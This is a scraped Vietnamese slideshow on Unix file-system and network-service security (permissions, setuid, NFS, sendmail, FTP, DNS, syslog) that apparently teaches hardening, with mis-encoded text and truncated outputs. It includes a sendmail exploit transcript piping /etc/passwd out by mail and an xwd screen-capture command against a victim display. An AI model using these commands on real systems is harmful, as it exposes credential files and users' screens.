Download presentation
Presentation is loading. Please wait.
1
HEÄ THOÁNG TAÄP TIN CUÛA UNIX
File System Security HEÄ THOÁNG TAÄP TIN CUÛA UNIX Ñoái vôùi heä ñieàu haønh UNIX, khoâng coù khaùi nieäm caùc oå ñóa khaùc nhau. Sau quaù trình khôûi ñoäng, toaøn boä caùc thö muïc vaø taäp tin ñöôïc ‘gaén ‘ leân (mount) vaø taïo thaønh moät heä thoáng taäp tin thoáng nhaát, baét ñaàu töø goác ‘/’
2
SUN OS File System Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ df -k Filesystem kbytes used avail capacity Mounted on /dev/dsk/c0t0d0s % / /dev/dsk/c0t0d0s % /usr /proc % /proc fd % /dev/fd /dev/dsk/c0t0d0s % /var /dev/dsk/c0t0d0s % /opt /dev/dsk/c0t0d0s % /other /dev/dsk/c0t0d0s % /usr/openwin swap % /tmp /dev/dsk/c0t1d0s % /squid $
3
Linux File System [citd@server citd]$ df -k
Filesystem blocks Used Available Capacity Mounted on /dev/sda % / /dev/sda % /export /dev/sda % /usr /dev/sda % /var citd]$
![Linux File System citd]$ df -k](http://slideplayer.com./slide/14908153/91/images/3/Linux+File+System+citd%5D%24+df+-k.jpg "Filesystem 1024-blocks Used Available Capacity Mounted on. /dev/sda % / /dev/sda % /export. /dev/sda % /usr. /dev/sda % /var. citd]$")
4
/ ! /bin ! /sbin ! /usr /usr/bin ! !------/usr/sbin ! !------/usr/local ! !------/usr/doc ! ! /etc ! /lib ! /var /var/adm !------/var/log !------/var/spool
5
TÖÔNG ÖÙNG GIÖÕA DISK PARTITIONS
VAØ CAÁU TRUÙC TAÄP TIN / / /usr /usr/home /usr /squid /usr/home /mnt /mnt/cdrom /squid CD
6
GIÔÙI THIEÄU CAÙC THÖ MUÏC QUAN TROÏNG CUÛA UNIX
/ (THÖ MUÏC GOÁC ) /bin /sbin /usr/bin /usr/sbin /var /var/log /var/adm /home /export/home (SUNOS)
7
Quyeàn vaø sôû höõu taäp tin vaø thö muïc cuûa Unix
(directory and file permission and ownership) Keát quaû cuûa leänh ls -l -rw-r—r— 1 fido users Dec :31 myfile Khi moät taäp tin hay thö muïc ñöôïc taïo ra, noù mang owner vaø group cuûa ngöôøi taïo ra noù. Phaàn quyeàn daønh cho user, group, other phuï thuoäc vaøo giaù trò cuûa umask
8
Umask vaø caùc quyeàn truy nhaäp taäp tin
Ví duï : tnminh]$ umask 002 tnminh]$ echo “tao mot file” > tmp tnminh]$ ls -l total 5472 -rw-rw-r tnminh tnminh Oct 3 21:55 tmp /etc]$ umask 022 tnminh]$ echo “tao mot file khac”>tmp1 -rw-r--r tnminh tnminh Oct 3 21:59 tmp1
9
Daïng nhò phaân cuûa quyeàn truy nhaäp taäp tin vaø thö muïc
Quyeàn truy nhaäp taäp tin chia thaønh ba nhoùm soá cho chuû nhaân (user), nhoùm (group) vaø coøn laïi (others) read permission 4 write permission Execute permission Nhö vaäy : 0 or —-: No permissions at all 4 or r—: read-only 2 or -w-: write-only (rare) 1 or —x: execute 6 or rw-: read and write 5 or r-x: read and execute 3 or -wx: write and execute (rare) 7 or rwx: read, write, and execute
10
Thay ñoåi caùc thuoäc tính cuûa taäp tin vaø thö muïc
Caùch thay ñoåi töông ñoái : chmod g+w myfile theâm khaû naêng write cho group cuûa myfile chmod o-x myfile bôùt khaû naêng chaïy cuûa others cuûa myfile Caùch thay ñoåi tuyeät ñoái : chmod 644 myfile => myfile seõ coù quyeàn rw-r--r-- Ñoái vôùi caùc admin, neân duøng caùch tuyeät ñoái vì noù an toaøn hôn. Ñoái vôùi caùc thö muïc, thao taùc hoaøn toaøn töông ñöông. chown cho pheùp ñoåi ngöôøi sôû höõu taäp tin, Chgrp cho pheùp ñoåi nhoùm cuûa taäp tin,
11
setuid vaø setgid bits Set-user-id : Set-user-id nghóa laø khi chöông trình ñöôïc chaïy, noù seõ coù quyeàn nhö ngöôøi chuû (owner) cuûa file cho duø ngöôøi goïi chöông trình laø ai ñi nöõa. Ví duï : $ ls –l /usr/sbin/sendmail rwsr-xr-x root root sendmail Töông töï, set-group-id cho quyeàn chöông trình nhö group cuûa taäp tin chöông trình. Bit thöù 4 maõ giaù trò naøy. 4 = setuid; 2= setgid, Neáu /bin/sh coù setuid bit set thì ai cuõng laø root vì owner cuûa /bin/sh laø root vaø moïi user ñeàu duøng /bin/sh khi login . setgid cho thö muïc = taäp tin taïo ra trong thö muïc naøy coù cuøng group nhö group cuûa thö muïc Setuid cho taäp tin = khoâng coù taùc duïng Sticky bit = user chæ coù quyeàn xoùa file do mình laø owner. Ví duï /tmp
12
Baûo maät heä thoáng baèng kieåm tra setuid vaø setgid bits
Tìm taäp tin coù setuid bit set find / -perm exec ls -l {} \; Töông töï cho setguid : Tìm taäp tin khoâng user find / -nouser -exec ls -l {} \; Tìm taäp tin vieát ñöôïc find / -perm –2 -print Tìm taäp tin khoâng sôû höõa find / -nouser -print
13
-r-s--x--x 1 root root 10704 Apr 15 1999 /usr/bin/passwd
-rws--x--x 2 root root Apr /usr/bin/suidperl -rws--x--x 2 root root Apr /usr/bin/sperl -rwsr-sr-x 1 root mail Apr /usr/bin/procmail -rwsr-xr-x 1 root root Apr /usr/bin/rcp -rwsr-xr-x 1 root root Apr /usr/bin/rlogin Chuù yù : Khoâng neân cho caùc shell script giaù trò setuid hay setgid. Neáu chuùng ta caàn setuid, setgid, vieát chöông trình baèng C hay moät ngoân ngöõ laäp trình töông ñöông.
14
Moät soá taäp tin "nguy hieåm". Trusted hosts
/etc/hosts.equiv : Ngöôøi söû duïng töø moät maùy coù IP trong taäp tin naøy, coù cuøng account name, coù theå söû duïng rlogin vaø rsh maø khoâng caàn vaøo password treân maùy naøy. Raát may raèng root laø moät ngoaïi leä . .rhosts : gioáng nhö /etc/hosts.equiv, nhöng kieåm tra host-user. Ñaëc bieät user coù theå taïo .rhosts khoâng thoâng qua admin. Vì vaäy, neân hoaøn toaøn caám vieäc taïo ra .rhosts taïi caùc thö muïc caù nhaân.
15
Checksum vaø checklist
Leänh sum cho pheùp xem xeùt xem taäp tin coù bò thay ñoåi veà noäi dung hay khoâng. Ñieàu naøy giuùp chuùng ta phaùt hieän ñöôïc virus vì virus noùi chung phaûi thay ñoåi noäi dung cuûa file. Neân chaïy sum taïi nhöõng thö muïc maø noäi dung khoâng thay ñoåi veà nguyeèn taéc /sbin, /bin . Ghi laïi keát quaû vaøo moät taäp tin vaø söû duïng sau naøy ñeå bieát nhöõng taäp tin coù checksum thay ñoåi. Checklist (thoâng qua leänh ls) cho pheùp tìm ra nhöõng thay ñoåi cuûa caùc taäp tin heä thoáng. Chuùng ta, cuõng nhö checksum, neân taïo moät file checklist ngay töø ñaàu. Baèng caùch naøy, chuùng ta seõ bieát ñöôïc caùc taäp tin môùi taïo ra khoâng hôïp phaùp.
16
Access Control List (ACL)
Ñaây laø moät chuaån môùi cuûa Unix cho pheùp phaân quyeàn haïn truy nhaäp vaøo heä thoáng taäp tin moät caùch chi tieát hôn heä thoáng cuûa Unix truyeàn thoáng. Heä thoáng naøy cho pheùp ví duï caû group ggg coù quyeàn ñoïc vaø user uuu cuûa group ggg naøy coù quyeàn ñoïc vaø vieát. Hai leänh cô baûn cuûa ACL laø getfacl vaø setfacl. Neáu chuùng ta boå sung ACL cho moät taäp tin, chuùng ta duøng leänh setfacl -m acl_entry_list filename ñeå bieát moät taäp tin coù söû duïng ACL, vôùi leänh ls -l ta coù -rw-r etc . Daáu + hieån thò raèng taäp tin söû duïng ACL Coù theå söû duïng ACL treân SUN OS 5.6
17
Network File System (NFS)
NFS, the Network File System has three important characteristics: It makes sharing of files over a network possible. It mostly works well enough. It opens a can of security risks that are well understood by crackers, and easily exploited to get access (read, write and delete) to all your files. Treân nguyeân taéc, NFS server tin NFS client vaø ngöôïc laïi. Do ñoù, neáu NFS server hay client bò xaâm nhaäp seõ deã daøng daãn ñeán söï xaâm nhaäp vaøo toaøn boä maïng NFS.
18
NFS model Server : eris. /etc/exports /mn/eris/local apollon(rw) Client : apollon mount -o size=1024,wsize=1024 eris:/mn/eris/local /mnt cd /mnt ls –l Or in /etc/fstab # device mountpoint fs-type options dump fsckorder eris:/mn/eris/local /mnt nfs rsize=1024,wsize=
19
NFS Client Security nosuid option : the server's root user cannot make a suid-root program on the file system, log in to the client as a normal user and then use the suid-root program to become root on the client.
20
Remote Call Procedure (RPC)-based services
- ñoái vôùi TCP, UDP protocols, port number coù 2 bytes (65536 max.) - Moãi RPC-based coù moät RPC service number duy nhaát 4 bytes (4294 Mports - portmapper ñôïi ôû coång 111 (TCP vaø UDP) - khi moät RPC based server khôûi ñoäng, noù seõ chieám moät coång TCP hay UDP port, sau ñoù thoâng baùo cho portmapper aùnh xaï giöõa soá RPC duy nhaát cuûa noù vaø coâng TCP/UDP noù vöøa nhaän. - khi moät RPC client muoán keát noái vôùi moät RPC-based server, noù “hoûi “ portmapper vaø ñöôïc bieát coång TCP ma ø RPC-based server ñang ñôïi. - Client vaø server “queân “ portmapper vaø noái tröïc tieáp vôùi nhau. - Keû xaâm nhaäp coù theå bypass portmapper
21
NFS Server Security root_squash option : Now, if a user with UID 0 on the client attempts to access (read, write, delete) the file system the server substitutes the UID of the servers `nobody' account. Which means that the root user on the client can't access or change files that only root on the server can access or change. Nhöng root cuûa client coù theå su thaønh bin hay adm vaø coù theå xaâm nhaäp vaøo caùc taäp tin coù owner=bin treân server. Vì vaäy, nhöõng taäp tin binaries hay taäp tin thöôøng quan troïng neân coù owner laø root. portmapper vaø nfsd coù theå coù vaán ñeà veà security, cho pheùp thaâm nhaäp traùi pheùp vaøo Server file system. Ñeå khaéc phuïc sô hôû naøy caàn coù portmap: ALL trong taäp tin /etc/hosts.deny vaø portmap: / trong /etc/hosts.allow ñeå cho pheùp network ñöôïc söû duïng portmapper Neáu /etc/exports chæ coù file system maø khoâng coù host, moïi host ñeàu coù quyeàn mount file system cuûa server.
22
Network Information Service (NIS, NIS+)
SUN 1990 NIS is a service that provides information, that has to be known throughout the network, to all machines on the network. Information likely to be distributed by NIS is: · login names/passwords/home directories (/etc/passwd) · group information (/etc/group) If, for example, your password entry is recorded in the NIS passwd database, you will be able to login on all machines on the network which have the NIS client programs running. NIS+ is designed by Sun Microsystems Inc. as a replacement for NIS with better security and better handling of large installations.
23
NIS security problems Moät workstation tham gia vaøo NIS caàn phaûi coù taäp tin /etc/passwd vôùi doøng cuoái cuøng nhö sau : +::0:0::: Hoaëc +: Neáu ta duøng doøng moät vaø queân daáu +, ta seõ coù moät super-user khoâng login name vaø khoâng password ;-(. Vì vaäy neân duøng doøng leänh thöù hai) Neáu /etc/hosts.equiv chæ chöùa + thì taát caû caùc user cuûa taát caû caùc host coù teân account nhö maùy naøy coù theå truy nhaäp khoâng caàn password. Chuù yù moät soá Unix, keå caû SUN, caøi hosts.equiv chæ vôùi moät doøng nhö vaäy ;-(
24
#!/bin/sh # # fscheck - check file system for insecurities # This should be run as root PATH=/usr/bin:/bin export PATH CHECKDIRS="/bin /etc /usr/bin /usr/etc /usr/lib /usr/ucb" # ls.master is the file to create by command 'ls -alsgR $CHECKDIRS > ls.master MASTER_LS=ls.master # sum.master is the file to create by command 'find $CHECKDIRS -type f -exec echo -n {} " " \; -exec sum {} \; > sum.master MASTER_SUM=sum.master # echo"Set-User-Id files found:" find / -type f -a -perm exec ls -aslg {} \; echo "" echo."Set-Group-Id files found:" find / -type f -a -perm exec ls -aslg {} \; echo"Device files not located in /dev :" find / \( -type b -o -type c \) -print) | grep -v '^/dev' echo "World writable files and directories : " find / -perm -2 -exec ls -aslgd {} \;
25
# echo " Files owned by none xistents user or group :" find / \( -nouser -o -nogroup \) -exec ls -aslgd {} \; echo "" ls -alsgR $CHECKDIRS > /tmp/lschk.$$ find $CHECKDIRS -type f -exec echo -n {} " " \; -exec sum {} \; > /tmp/sumchk.$$ echo "Files in $CHECKDIRS whose attributes have changed : " echo "< = master check list, > = current listing" diff $MASTER_LS /tmp/lschk.$$ echo "Files in $CHECKDIRS whose checksums have changed:" diff $MASTER_SUM /tmp/sumchk.$$ rm -f /tmp/lschk.$$ /tmp/sumchk.$$ exit 0
26
Baøi 3 : Network Service Security
Treân ñaây, chuùng ta ñaõ ñeà caäp nhieàu ñeán baûo maät choáng caùc xaâm nhaäp thoâng qua caùc ñieåm yeáu hay caùc loãi caøi ñaët heä thoáng cuûa heä ñieàu haønh UNIX. Chuùng ta seõ chuyeån sang xem xeùt caùc xaâm nhaäp thoâng qua caùc dòch maø maùy Unix môû ra cho maïng.
27
Inetd vaø /etc/inet.conf
inetd ñöôïc söû duïng ñeå khôûi ñoäng caùc daemon cung caáp caùc dòch vuï maïng. inetd ñôïi caùc noái maïng sau moät soá coång. Khi coù yeâu caàu keát noái, inetd seõ goïi chöông trình server töông öùng ñeå thieát laäp caùc keát noái. inetd seõ ñoïc file /etc/inetd.conf khi ñöôïc goïi leân boä nhôù . # <service_name> <sock_type> <proto> <flags> <user> <server_path> <args> # Echo, discard, daytime, and chargen are used primarily for testing. # To re-read this file after changes, just do a 'killall -HUP inetd' #time stream tcp nowait root internal #time dgram udp wait root internal # # These are standard services. ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
28
Inetd vaø security /etc/inet.conf coù theå duøng ñeå giaûi quyeát moät soá vaán ñeà veà baûo maät nhö sau : - Neáu chuùng ta khoâng muoán söû duïng dòch vuï naøo, chuùng ta chæ vieäc ñôn giaûn ñaët daáu # tröôùc doøng caáu hình keát noái ñoù. Vôùi nhöõng maùy tính ñoøi hoûi baûo maät cao, quy taéc chung laø caám heát taát caû caùc dòch vuï maø chuùng ta khoâng caàn hoaëc khoâng bieát.Trong tröôøng hôïp maùy hoaït ñoäng khoâng bình thöôøng, chuùng ta boû daàn caùc chuù thích # vaø nhö vaäy chuùng ta seõ hieåu chöùc naêng cuûa caùc dòch vuï. - Caùc dòch vuï neân xem xeùt boû laø finger, tftp, talk - Vôùi dòch vuï ñang coù vaán ñeà veà baûo maät nhöng khoâng caét ñi ñöôïc, chuùng ta coù theå giaûm quyeàn cuûa dòch vuï baèng caùch thay thoâng tin trong tröôøng user
29
Email, SMTP vaø Sendmail
- laø dòch vuï cô baûn vaø phoå bieán nhaát cuûa Internet. Giao dieän duøng cho keát noái laø SMTP (Simple Mail Transfer Protocol). - Sendmail laø moät SMTP server phoå bieán nhaát. Maëc duø sendmail ñaõ bò nhieàu "tai tieáng " veà baûo maät trong lòch söû phaùt trieån, nhöng ñeán hieän nay vaãn chöa coù moät chöông trình naøo coù khaû naêng thay theá sendmail, nhaát laø veà maët tính naêng. Nguyeân nhaân cuûa caùc bug cuûa sendmail laø vì sendmail khaù daøi vaø phöùc taïp (# doøng leänh), ñoàng thôøi khi chaïy treân boä nhôù, sendmail phaûi coù quyeàn nhö root ñeå thöïc hieän nhieäm vuï cuûa mình. Tuy nhieân, do coù nhieàu ngöôøi söû duïng sendmail, loãi cuûa sendmail seõ ñöôïc tìm ra raát nhanh choùng vaø ñöôïc thoâng baùo roäng raõi cho pheùp söûa chöõa nhanh choùng.
30
2 con ñöôøng thaâm nhaäp qua Mail Server
1. Qua caùc leänh maø mail server nhaän töø ngoaøi : command channel attacks. Morris worm ñaõ söû duïng con ñöôøng naøy baèng caùch söû duïng loãi debug cuûa sendmail 2. Qua noäi dung cuûa mail : data-driven attacks. Caùc chöông trình Mail Server ñeàu söû duïng moät chöông trình mail local ñeå göûi/nhaän thö noäi boä cuûa maùy, giao dieän vôùi ngöôøi söû duïng. Treân Unix, ñoù thöôøng laø /bin/mail. Neáu /bin/mail coù bug, keû xaâm nhaäp coù theå baét /bin/mail thöïc hieän caùc leänh ghi trong body cuûa mail. Thö ñieän tö ngaøy nay thöôøng laø Multimedia, do ñoù caàn nhöõng chöông trình ngoaøi ñeå “ñoïc “ thö. Chöông trình ngoaøi naøo “ñoïc “ thö vaø “ñoïc “ nhö theá naøo laø ngoaøi taàm kieåm soaùt cuûa caùc chöông trình mail coå ñieån. Ví duï nhö moät leã giaùng sinh, maïng cuûa IBM bò teâ lieät bò phaûi göûi moät caùch töï ñoäng haøng trieäu mail coù nhaïc cuûa leã giaùng sinh. Haõy caån thaän vôùi nhöõng thö vôùi noäi dung khuyeân baïn ñoåi password sang moät password môùi töø admin, hay baùo cho nhaø baêng code caù nhaân cuûa card visa cuûa baïn.
31
Kieåm tra sendmail ñang chaïy
Caùc ñieåm caàn kieåm tra : Duøng version môùi. Caàn kieåm tra version cuûa sendmail vì moät soá version cuõ coù vaán ñeà lieân quan tôùi baûo maät heä thoáng $ telnet pasteur.bvt.hcm 25 220 pasteur.bvt.hcm ESMTP Sendmail 8.9.3/8.9.3; Wed, 17 Nov :46: Moät soá chöùc naêng wiz, debug khoâng ñöôïc coù 220 pasteur.bvt.hcm ESMTP Sendmail 8.9.3/8.9.3; Wed, 17 Nov :46:35 700 wiz 500 Command unrecognized: "wiz" Debug 500 Command unrecognized: "debug" Neáu debug set thì version sendmail cuûa baïn caàn phaûi thay
32
Ví duï moät loãi cuûa sendmail
telnet victim.com 25 Trying … Connected to victim.com Escape character is '^]'. 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 Mail from : "|/bin/mail < /etc/passwd" 250 "|/bin/mail < /etc/passwd" … sender OK Rcpt to : nosuchuser 550 nosuchuser … User unknow Data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted Quit Connection closed by foreign host. $
33
FTP File Transfer Protocol ñöôïc thöïc hieän bôûi ftp vaø ftpd. Caàn söû duïng ftpd sau 1989 Ñeå baûo maät ftp caàn caáu hình toát cho anonymous FTP taïo account ftp vaø * cho tröôøng password ñeå khoâng login taïo home directory cho account ftp (ví duï /home/ftp) thö muïc naøy owner =ftp vaø khoâng ai ñöôïc ghi chown ftp ~ftp chmod 555 ~ftp taïo caùc thö muïc bin,etc, usr tuøy thuoäc theo yeâu caàu cuûa Unix ñang söû duïng vaø caùc thö muïc naøy ñeàu coù quyeàn 555 cheùp taäp tin passwd vaø group vaøo ~ftp/etc. Xoùa taát caû caùc account, tröø ftp. 2 taäp tin naøy coù quyeàn 444
34
ftp (2) Cheùp ls vaøo ~ftp/bin vôùi quyeàn 111
Taïo thö muïc ~ftp/pub vôùi quyeàn 577, owner ftp. Anonymous connection seõ duøng ftp account. Hieän nay, neáuchuùng ta caøi ñaët wu-ftp, caùc quyeàn cuûa caùc thö muïc naøy seõ ñöôïc laøm töï ñoäng Ví duï ftp config cuûa RedHat 6.0 /home]$ ls -l total 9 drwxr-xr-x 6 root root Mar ftp drwxr-xr-x 2 root nobody Apr samba
35
ftp (3) [tnminh@pateur /home]$ ls -l ftp total 4
d--x--x--x 2 root root Nov 5 02:15 bin d--x--x--x 2 root root Nov 5 02:15 etc drwxr-xr-x 2 root root Nov 5 02:15 lib dr-xr-sr-x 2 root ftp Mar pub /home]$ etc]# more ~ftp/etc/passwd root:*:0:0::: bin:*:1:1::: operator:*:11:0::: ftp:*:14:50::: nobody:*:99:99::: etc]#
![ftp (3) /home]$ ls -l ftp total 4](http://slideplayer.com./slide/14908153/91/images/35/ftp+%283%29+%2Fhome%5D%24+ls+-l+ftp+total+4.jpg "d--x--x--x 2 root root 1024 Nov 5 02:15 bin. d--x--x--x 2 root root 1024 Nov 5 02:15 etc. drwxr-xr-x 2 root root 1024 Nov 5 02:15 lib. dr-xr-sr-x 2 root ftp 1024 Mar pub. /home]$ etc]# more ~ftp/etc/passwd. root:*:0:0::: bin:*:1:1::: operator:*:11:0::: ftp:*:14:50::: nobody:*:99:99::: etc]#")
36
ftp (4) : /etc/ftpusers /etc/ftpusers chöùa nhöõng account khoâng döôïc noái vaøo qua ftp, ví duï nhö root, bin … Ví duï /etc/ftpusers cuûa Linux Redhat 6.0 /tmp]# more /etc/ftpusers root bin daemon adm lp sync
37
shutdown halt mail news uucp operator games nobody /tmp]# Taäp tin /etc/shells chöùa caùc shells maø caùc user ñöôïc söû duïng nhö bash, sh, ash, bsh ...
![shutdown halt. mail. news. uucp. operator. games. nobody. /tmp]#](http://slideplayer.com./slide/14908153/91/images/37/shutdown+halt.+mail.+news.+uucp.+operator.+games.+nobody.+%2Ftmp%5D%23.jpg "Taäp tin /etc/shells chöùa caùc shells maø caùc user ñöôïc söû duïng nhö bash, sh, ash, bsh ...")
38
tftp Do tftp khoâng ñoøi hoûi password, chuù yù vaán ñeà baûo maät vôùi tftp. Tftp cuûa SUNOS tröôùc 4.0 coù loãi cho pheùp get caùc taäp tin, ngay caû cuûa /etc. Caàn thay version naøy.
39
Domain Name System (DNS)
Loãi ñaàu tieân cuûa DNS laø DNS server vaø client khoâng kieåm tra xem traû lôøi maø noù coù laø töø caùc server maø noù hoûi hay töø moät nguoàn naøo ñoù .Server coù theå cache nhöõng thoâng tin sai laïc naøy vaø söû duïng khi coù caâu hoûi. Ví duï, keû xaâm nhaäp coù theå noùi cho server IP cuûa maùy cuûa hoï chính laø maùy maø baïn tin töôûng (trusted) vaø maùy cuûa hoïc coù theå rlogin khoâng qua password. BIND Version 4.9 coù söûa ñöôïc loãi keå treân Treân moät soá OS (ví duï SUNOS 4.x), quaù trình lookup/double reverse lookup ñöôïc töï ñoäng thöïc hieän. Töùc laø DNS seõ tìm IP-> Name roài Name -> IP vaø kieåm tra 2 IP xem coù khôùp khoâng. Tuy nhieân phöông phaùp naøy khoâng loaïi boû ñöôïc hoaøn toaøn loãi cuûa DNS.
40
Social Engineering attack
DNS thöôøng cho raát nhieàu thoâng tin veà maïng noäi boä nhö teân maùy, kieåu maùy … Keû xaâm nhaäp vôùi nhöõng thoâng tin naøy coù maïo nhaän laø kyõ thuaät vieân baûo haønh ñeán yeâu caàu ñöôïc coi maùy vaø coù theå hoûi password Laøm sao khoâng cho keû xaâm nhaäp quaù nhieàu thoâng tin ? Coù phöông aùn laøm 2 DNS server; moät ñaët taïi trong firewall vaø coù nhieàu thoâng tin. DNS thöù hai naèm ngoaøi vaø chæ coù moät soá raát thoâng tin toái thieåu cho keát noái cuûa maïng. Hai tröôøng HINFO vaø TXT thöôøng chöùa nhieàu thoâng tin hoaøn toaøn chæ cho noäi boä .
41
Internet P A C K E T F I L R Real DNS server Fake DNS server DNS Client DNS Client DNS Client
42
Setup fake and real servers
Fake server laø primary server server cho domain cuûa baïn. Primary server caàn phaûi coù ñuû thoâng tin veà caùc maùy caàn noái tröïc tieáp ra Internet nhö www, ftp, news … servers. Caùc thoâng tin phaûi cho pheùp laøm ñöôïc double reverse lookup vì ngaøy nay raát phaùt trieån caùc ftp, mail servers phuïc vuï chæ sau khi quaù trình double reverse lookup thaønh coâng Real DNS server coù chöùa forwarders directive troû ra fake server vaø real server laø slave server. Nhö vaäy real server seõ hoûi fake server vôùi nhöõng address maø noù khoâng bieát. Real server coù theå coù taát caû caùc chi tieát veà maïng noäi boä ñeå traû lôøi cho caùc DNS client trong maïng noäi boä maø khoâng moät ngöôøi ngoaøi naøo coù theå tìm ñöôïc thoâng tin naøy. Ngay caû DNS client cuûa maùy ngoaøi coù Fake DNS server cuõng hoûi vaøo real server thoâng qua resolv.conf
43
SYSLOG /etc/syslog.conf| The facility is one of the following keywords: auth, auth-priv, cron, daemon, kern, lpr, mail, mark, news, security (same as auth), syslog, user, uucp and local0 through local7. The keyword security should not be used anymore and mark is only for internal use and therefore should not be used in applications. Anyway, you may want to specify and redirect these messages here. The facility specifies the subsystem that produced the message, i.e. all mail programs log with the mail facility (LOG_MAIL) if they log using syslog. The priority is one of the following keywords, in ascending order: debug, info, notice, warning, warn (same as warning), err, error (same as err), crit, alert, emerg, panic (same as emerg). The keywords error, warn and panic are deprecated and should not be used anymore. The priority defines the severity of the message Noùi chung, /var/adm/messages chöùa caùc thoâng tin lieân quan tôùi caùc quaù trình logon. Ñaëc bieät caàn phaûi chuù yù ñeán phaàn login bôûi root. Neân coù quy taéc chung laø login vôùi account thöôøng roài su khi caàn thieát ñeå bieát ai laø ngöôøi söû duïng quyeàn root. Coù theå config /etc/syslog.conf ñeå log caùc thoâng tin qua moät maùy khaùc.
44
SYSLOG (2) /etc/syslog.conf # Log all kernel messages to the console.
# Logging much else clutters up the screen. #kern.* /dev/console # Log anything (except mail) of level info or higher. # Don't log private authentication messages! *.info;mail.none;news.none;authpriv.none /var/log/messages # The authpriv file has restricted access. authpriv.* /var/log/secure # Log all the mail messages in one place. mail.* /var/log/maillog # Everybody gets emergency messages, plus log them on another # machine. *.emerg *
45
/etc/syslog.conf # Save mail and news errors of level err and higher in a # special file. uucp,news.crit /var/log/spooler # Save boot messages also to boot.log local7.* /var/log/boot.log # # INN news.=crit /var/log/news/news.crit news.=err /var/log/news/news.err news.notice /var/log/news/news.notice /tmp]#
46
TCPDUMP tcpdump laø tieän ích cho pheùp theo doõi caùc moái noái (connections). Ñaây laø moät coâng cuï raát maïnh cho pheùp baûo trì maïng thoâng tin, ñoàng thôøi theo doõi neáu coù caùc toan tính thaâm nhaäp. Moät soá options thöôøng duøng :
47
Laáy thoâng tin treân maøn hình
Baèng moät soá leänh, ngöôøi xaâm nhaäp coù theå cheùp noäi dung cuûa maøn hình cuûa ngöôøi khaùc xwd -display victim:0 -root >screen.out xwud -in screen.out
48
Summary Xem xeùt /etc/inetd.conf, boû caùc service khoâng caàn thieát, nhaát laø treân caùc bastion host. Thay ñoåi user cuûa caùc service thaønh caùc user "yeáu " hôn, ví duï finger chaïy vôùi nobody, Kieåm tra kyõ caøi ñaët ftp, thöû khaû naêng write (upload) cuûa anonymous ftp, Kieåm tra phieân baûn cuûa sendmail, /bin/mail, named, finger, tftp, Caáu hình heä thoâng syslog Theo doõ caùc connection baèng tcpdump hoaëc chöông trình töông ñöông
Similar presentations
